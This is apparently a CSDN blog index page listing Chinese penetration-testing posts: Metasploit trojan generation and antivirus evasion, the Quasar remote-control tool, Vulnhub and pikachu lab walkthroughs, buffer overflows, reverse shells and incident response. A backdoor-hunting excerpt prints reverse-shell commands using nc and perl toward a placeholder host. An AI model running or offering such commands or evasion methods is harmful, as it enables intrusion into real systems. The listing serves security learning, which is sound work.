C howe-CSDN博客

原创 MSF（3）免杀混淆

前面说了木马的捆绑，dll,exe，hta等密码，但是木马落地就容易被杀软检测直接隔离了，本章节主要讲我们要怎么对木马进行一个简单的混淆，进行一个简单的免杀。

2025-05-07 10:28:21 329

原创 MSF（2）生成dll木马

声明！本文章所有的工具分享仅仅只是供大家学习交流为主，切勿用于非法用途，如有任何触犯法律的行为，均与本人及团队无关！！！

2025-04-22 20:29:29 449

HFish是一款开源免费的主动防御型蜜罐系统，专注于企业及家庭网络的安全场景，通过模拟真实服务、设备和漏洞构建“诱饵陷阱”，实现对攻击行为的捕获与分析。其采用B/S架构，由管理端（数据展示与分析）和节点端（蜜罐服务部署）组成，支持跨平台部署（Linux/Windows/Docker），可快速构建包括SSH、FTP、MySQL、Redis等40余种高交互蜜罐，覆盖常见OA系统、网络设备及Web应用漏洞。

2025-04-18 11:34:12 807

原创 MSF（1）生成远控木马

声明！本文章所有的工具分享仅仅只是供大家学习交流为主，切勿用于非法用途，如有任何触犯法律的行为，均与本人及团队无关！！！

2025-04-18 10:42:26 227

原创 Windows远控利器：Quasar

Quasar 是一款基于 C# 开发的免费开源远程控制工具，专为 Windows 系统设计，支持从 Windows XP 到 Windows 11 的全系列操作系统。其核心功能包括远程桌面控制、文件传输（TLS 加密）、系统监控、键盘记录、密码恢复（浏览器及 FTP 客户端）及注册表编辑等，同时具备 TCP/IPv4/IPv6 网络优化、UPnP 端口映射和 QuickLZ 压缩技术。尽管该工具最初用于合法场景（如 IT 运维、设备监控），但因其高隐蔽性和可定制性，常被黑客篡改为远控木马进行非法活动。

2025-04-17 16:48:57 254

原创 Vulnhub-PwnOS v1.0靶机

首先通过信息收集发现该靶机10000端口的webmin存在文件读取漏洞，然后通过读取shadow文件信息，破解哈希或者ssh账号密码，最后再通过cgi提权。

2025-04-02 16:30:11 283

原创 Vulnhub-IMF靶机

首先通过信息收集（如端口扫描、目录枚举的源码审计）发现潜在信息泄露，接着利用SQL注入获取关键上传php信息，然后通过文件上传、命令注如（python3反弹shell），连接靶机，最后通过CVE-2021-4034漏洞获取root权限完成渗透。

2025-04-02 16:17:26 290

原创应急响应-windows信息采集工具

在应急响应中，手动收集信息就像用算盘处理海量数据，而专业采集工具则如同超级计算机——两者的差距，直接决定了你是"手忙脚乱"还是"游刃有余"。所以有效的工具可以让我们采集信息的速度从“龟速”到“光速”

2025-04-01 16:43:47 471

原创 Vulnhub-zico2靶机打靶记录

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文，读者将能够对渗透Vulnhub系列zico2靶机有一定的了解。

2025-04-01 14:44:14 274

原创手工排查后门木马的常用姿势

● 重点关注：.php、.jsp、.asp、.sh 等可执行文件。● 隐藏文件：检查 /tmp/、/dev/shm/ 等临时目录。● 常见WebShell：shell.php、b374k.php、c99.php、wso.php。● 隐藏技巧：攻击者可能使用 …gif.php 伪装成图片。● 异常大文件：可能是攻击者存放的加密数据或恶意代码。● 常见后门进程：● nc -lvp 4444 -e /bin/bash（反弹Shell）● perl -e 'use Socket;i="x.x.x.x

2025-03-31 17:45:05 713

原创 Vulnhub-node靶机教学

本次靶机主要通过网页主页源码查看到api文件导致账号密码信息泄露，从而获取服务器普通用户权限，再根据机器上的系统内核版本的信息搜集，使用漏洞检索工具searchsploit，利用exp进行提权。

2025-02-21 17:21:34 565

原创漏洞扫描工具：AWVS

AWVS（Acunetix Web Vulnerability Scanner）是一款专业的Web漏洞扫描工具，用于检测网站的安全漏洞。它通过网络爬虫测试网站安全，检测流行安全漏洞，适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。

2025-02-14 11:43:06 403

原创 pikachu靶机-越权、目录遍历、敏感信息泄露

Over Permission（越权）是指在应用程序中，由于权限校验机制不完善，导致用户能够访问或操作其权限范围之外的资源。越权漏洞通常出现在需要登录的页面，尤其是涉及增、删、改、查等操作的场景目录遍历（Directory Traversal）是一种常见的Web安全漏洞，攻击者通过利用特殊字符（如…/）绕过服务器的安全限制，访问服务器上的任意文件，甚至执行系统命令。

2025-02-13 13:47:46 683

原创 Burp suite 之 IP伪造

Burp Suite的FakeIP插件主要用于在安全测试中伪造IP地址，以绕过服务器的IP限制或WAF（Web应用防火墙）的封锁。IP伪造这么便捷为什么不适用IP伪装而去使用IP代理池呢因为IP伪造的每个数据包只是为了骗过浏览器、waf的请求，但是网络建立的连接确实实实在在的。

2025-02-12 14:06:34 500

原创 crossfire1.9.0版本缓冲区溢出攻击到提权：linux32位

来自本公众号的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他用途！！！# 所有16进制字符。

2025-02-11 17:46:09 1993

原创渗透Vulnhub-election靶机日志信息泄露

本靶机主要是网页上的日志信息泄露，从而获取服务器普通用户权限，再根据机器上的应用程序版本的信息搜集，使用漏洞检索工具searchsploit，利用exp进行提权。（文中遇到的mysql跟/home/love/desktop/user.txt、 gnome-initial-setup-done 信息或程序大概率都是属于兔子洞骗你在这里花时间）

2025-02-10 09:36:32 642

原创渗透测试中反弹shell常用的几种姿势

反弹Shell（Reverse Shell），是一种网络安全概念，指的是攻击者通过特定的技术手段，使得受害者能够主动与攻击者建立连接，从而实现远程控制的目标系统。这种技术通常用于渗透测试和安全研究，但在非法环境中，它可能被用来窃取敏感信息或执行恶意代码。

2025-02-08 09:14:30 613

原创 pikachu靶场非安全文件下载/上传

文件下载功能在很多web系统上都会出现，一般我们当点击下载链接，便会向后台发送一个下载请求，一般这个请求会包含一个需要下载的文件名称，后台在收到请求后会开始执行下载代码，将该文件名对应的文件response给浏览器，从而完成下载。如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话，则可能会引发不安全的文件下载漏洞。此时如果攻击者提交的不是一个程序预期的的文件名，而是一个精心构造的路径(比如…/…/…/etc/passwd),则很有可能会直接将该指定的文件下载下来。

2025-02-07 14:57:46 768

原创缓冲区溢出漏洞攻击及获取权限

来自本公众号的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他用途！！！

2025-01-27 11:41:36 1439

原创靶机复现-pikachu靶机文件包含漏洞

文件包含漏洞是编程中的一种安全隐患，常见于PHP等语言。它源于程序运行时依据用户输入或外部数据动态包含文件的机制，当对输入路径缺乏足够验证和过滤时，攻击者可构造恶意路径。这一漏洞危害巨大，既能实现代码执行，让攻击者在目标服务器植入恶意程序、控制服务器，又能导致敏感信息泄露，像数据库和用户认证信息等外流。防范方面，要对包含文件的输入严格验证过滤，采用白名单等方式确保文件来源合法；在服务器端（如PHP里）关闭远程文件包含功能；同时遵循最小权限原则，限制运行Web应用的用户的权限，从而降低被攻击后的损害程度。

2025-01-21 15:25:14 615

原创 pikachu靶机-sql注入

本篇文章旨在为网络安全渗透测试靶机复现学习（内容学习中，仅供参考）。通过阅读本文，读者将能够对渗透pikachu靶场SQL注入模块有一定的了解。

2025-01-20 21:01:35 1171

原创 pikachu靶机-CSRF

本篇文章旨在为网络安全渗透测试靶机复现教学。通过阅读本文，读者将能够对渗透pikachu靶场CSRF跨站脚本攻击模块有一定的了解。

2025-01-17 14:15:49 647

原创 pikachu靶机-Cross-Site Scripting（XSS）

本篇文章旨在为网络安全渗透测试靶机复现教学。通过阅读本文，读者将能够对渗透pikachu靶场XSS跨站脚本攻击模块有一定的了解。

2025-01-16 14:58:33 903

原创 pikachu靶机学习-爆破模块

本篇文章旨在为网络安全渗透测试靶机复现教学。通过阅读本文，读者将能够对渗透pikachu靶场暴力破解模块有一定的了解。

2025-01-15 17:27:25 446

原创渗透Vulnhub-SkyTower靶机

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文，读者将能够对渗透Vulnhub系列SkyTower靶机有一定的了解。

2025-01-14 14:36:31 1418

原创渗透Vulnhub-hackme靶机

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文，读者将能够对渗透Vulnhub系列hackme靶机有一定的了解。

2025-01-13 22:20:45 718

原创渗透测试武器库-悬剑5

相对于自己一个一个去下载安装所需的工具，并且为每一个工具配置各种依赖各种环境，悬剑武器库就适合我们这种可以偷懒的，它将我们平时常用的所需的各种工具都集成到了一个操作系统里，我们想要使用时只要在虚拟机运行此系统即可。悬剑5 基于“悬剑网盘”精选工具集+悬剑5“飞廉”云武器库制作。操作系统：Windows 10锁屏密码：secquan.org下载链接：https://pan.quark.cn/s/f79d9f472dfe提取码：Bypq。

2025-01-10 11:00:57 1922 2